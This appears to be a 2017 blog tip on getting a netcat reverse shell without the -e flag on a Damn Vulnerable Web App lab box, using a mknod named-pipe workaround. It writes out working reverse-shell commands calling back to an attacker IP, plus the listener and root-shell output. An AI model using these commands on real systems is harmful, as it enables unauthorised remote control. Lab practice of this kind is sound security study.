Reverse Shell Without -e

Notes, Tips, Tricks

Posted by coastal on February 21, 2017

I was looking into dropping a netcat reverse shell on the Damn Vulnerable Web App when I came across an issue, the -e flag was not supported on the server’s implementation of netcat. This means that the go-to way of initiating a reverse shell from the victim server would not function:

nc 192.168.56.1 4444 -e /bin/sh

The -e flag denoting that the following command is executed on connection, it passes a shell to the receiving end of the connection (the attacker listening on the connecting address / port):

nc -nvlp 4444

I stumbled across a workaround by Ed Skoudis from SANS. I like it alot and, as it relies on a command that is (seemingly) not usually limited in terms of user-accession and does not require extra permissions, it should be a pretty broadly applicable workaround.

The first step is to execute this command on the victim server:

mknod /tmp/backpipe p 

The description of the mknod man page is as follows:

int mknod(const char *pathname, mode_t mode, dev_t dev);

The system call mknod() creates a filesystem node (file, device special file or named pipe) named pathname, with attributes specified by mode and dev.

So here we make a named temporary pipe with a (default) FIFO passthrough structure, designated by the flag p, at the location /tmp/backpipe. Next we execute this command on the victim:

/bin/sh 0</tmp/backpipe | nc 192.168.56.1 4444 1>/tmp/backpipe

Alright, so the first part of the pipe redirects the stdout of /tmp/backpipe to the stdin of /bin/sh. The stdout of that chain is piped to our connection on nc 192.168.56.1 4444. To complete the circle, the stdout of thenc connection is chained to /tmp/backpipe. What a cool workaround!

From an attacker’s perspective, it looks like this:

coastal@coastal-LinuxBook:~$ nc -nvlp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.56.101] port 4444 [tcp/*] accepted (family 2, sport 53212)
whoami
root
hostname
owaspbwa

References

1. SANS Netcat Without -e